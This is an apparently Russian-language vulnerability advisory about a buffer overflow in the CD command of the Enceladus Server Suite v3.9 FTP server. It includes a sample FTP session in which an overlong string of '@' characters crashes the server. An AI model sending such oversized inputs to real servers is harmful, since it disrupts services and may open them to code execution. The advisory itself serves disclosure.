Переполнение буфера в Enceladus Server Suite v3.9
| Дата публикации: | 11.12.2002 |
| Всего просмотров: | 994 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Enceladus Server Suite – Web/FTP сервер для Windows, позволяющий безопасно организовывать общий доступ к файлам в сети. Длинная последовательно символов в качестве параметра к "CD" команде приведет к переполнению буфера. Если длина снабженной строки превышает размер ее входного буфера, дополнительные данные запишутся поверх других переменных на стеке. Уязвимость позволяет злонамеренному пользователю сконструировать специальный запрос, который приведет к выполнению кода на уязвимой системе. Пример: ts@metacortex:~$ ftp 192.168.10.2 Connected to 192.168.10.2. 220 Mollensoft FTP Server Ready. Name (192.168.10.2:ts): anonymous 331 Password required for anonymous. Password: 230 User anonymous logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 500 'EPSV': command not understood. 227 Entering Passive Mode (192,168,10,2,6,160) 150 Data connection open for PASV transfer. - -rwxr-xr-x 1 User Group 6468 Feb 17 01:13 index.html - -rwxr-xr-x 1 User Group 70 Oct 31 04:52 readme.txt 226 Listing complete. ftp> cd @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@ 421 Service not available, remote server has closed connection.Уязвимость обнаружена в Enceladus Server Suite 3.9 |
| Ссылки: | [SecurityOffice] Enceladus Server Suite v3.9 Buffer Overflow Vulnerability |